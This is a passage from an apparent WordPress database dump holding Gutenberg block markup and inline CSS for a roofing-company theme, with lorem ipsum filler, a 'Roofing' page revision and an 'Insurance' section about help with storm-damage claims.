{\"block_id\":\"4bfa1cec-a9f4-4166-901e-9903748ae37f\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":44,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-title-text {\n font-size: 44px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-4bfa1cec-a9f4-4166-901e-9903748ae37f {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-4bfa1cec-a9f4-4166-901e-9903748ae37f\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Where Caring for Our Community matters</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/section {\"blockId\":\"641a4bad-2941-4663-8a0a-39b77b1c76a8\",\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0} -->\n<div class=\"wp-block-skt-blocks-section skt-blocks-block-section-outer-wrap block-641a4bad-2941-4663-8a0a-39b77b1c76a8 background-type-none alignundefined\" style=\"z-index:1;max-width:900px;margin-left:auto;margin-right:auto\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-641a4bad-2941-4663-8a0a-39b77b1c76a8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-641a4bad-2941-4663-8a0a-39b77b1c76a8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-641a4bad-2941-4663-8a0a-39b77b1c76a8 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-641a4bad-2941-4663-8a0a-39b77b1c76a8.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0),rgba(255, 255, 255, 0)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-641a4bad-2941-4663-8a0a-39b77b1c76a8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-641a4bad-2941-4663-8a0a-39b77b1c76a8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-641a4bad-2941-4663-8a0a-39b77b1c76a8.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-641a4bad-2941-4663-8a0a-39b77b1c76a8.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"7af8e325-56c5-4e73-b6b5-cdd9823285d9\"} -->\n<style type=\"text/css\"> .block-7af8e325-56c5-4e73-b6b5-cdd9823285d9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-7af8e325-56c5-4e73-b6b5-cdd9823285d9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7af8e325-56c5-4e73-b6b5-cdd9823285d9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-7af8e325-56c5-4e73-b6b5-cdd9823285d9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-7af8e325-56c5-4e73-b6b5-cdd9823285d9 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-7af8e325-56c5-4e73-b6b5-cdd9823285d9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-7af8e325-56c5-4e73-b6b5-cdd9823285d9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-7af8e325-56c5-4e73-b6b5-cdd9823285d9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"0961c1cd-4713-4ce2-9dfb-56db08084ac3\"} -->\n<style type=\"text/css\"> .block-0961c1cd-4713-4ce2-9dfb-56db08084ac3 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0961c1cd-4713-4ce2-9dfb-56db08084ac3 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0961c1cd-4713-4ce2-9dfb-56db08084ac3 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0961c1cd-4713-4ce2-9dfb-56db08084ac3 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0961c1cd-4713-4ce2-9dfb-56db08084ac3 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0961c1cd-4713-4ce2-9dfb-56db08084ac3\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"b0ec077f-c0c6-4bba-b6e8-4c0d1356f3ea\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-b0ec077f-c0c6-4bba-b6e8-4c0d1356f3ea .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-b0ec077f-c0c6-4bba-b6e8-4c0d1356f3ea .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-b0ec077f-c0c6-4bba-b6e8-4c0d1356f3ea .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-b0ec077f-c0c6-4bba-b6e8-4c0d1356f3ea .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-b0ec077f-c0c6-4bba-b6e8-4c0d1356f3ea .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-b0ec077f-c0c6-4bba-b6e8-4c0d1356f3ea\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Roofing','','inherit','closed','closed','','215-revision-v1','','','2021-05-27 06:57:20','2021-05-27 06:57:20','',215,'https://cteisys.com/?p=343',0,'revision','',0),(226,1,'2021-05-27 10:52:48','2021-05-27 10:52:48','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"602ffb7e-28cc-4efb-b1a9-b82116ccde3c\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-602ffb7e-28cc-4efb-b1a9-b82116ccde3c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"c3da108a-9f74-4c6a-b160-7db1573b31fd\"} -->\n<style type=\"text/css\"> .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c3da108a-9f74-4c6a-b160-7db1573b31fd .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-c3da108a-9f74-4c6a-b160-7db1573b31fd skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"e200d26a-3c92-4d1c-873a-846519bc681e\"} -->\n<style type=\"text/css\"> .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-e200d26a-3c92-4d1c-873a-846519bc681e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-e200d26a-3c92-4d1c-873a-846519bc681e\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"793d8a43-7706-4aa2-ae62-65cce7fc4e0f\"} -->\n<style type=\"text/css\"> .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-793d8a43-7706-4aa2-ae62-65cce7fc4e0f\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"731771dc-fea2-4707-b3ae-e7328f6679c5\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-731771dc-fea2-4707-b3ae-e7328f6679c5 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-731771dc-fea2-4707-b3ae-e7328f6679c5\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Insurance</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph -->\n<p>We can assist you through your claims process to insure you have a stress free experience. Damage from downed trees, wind and hail storms may qualify for up to 100% cost coverage by your insurance company. Call Dunrite today for a free inspection to gain helpful insight into the claims process.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"64bd9830-1dd5-4212-b98b-e29fc494f308\"} -->\n<style 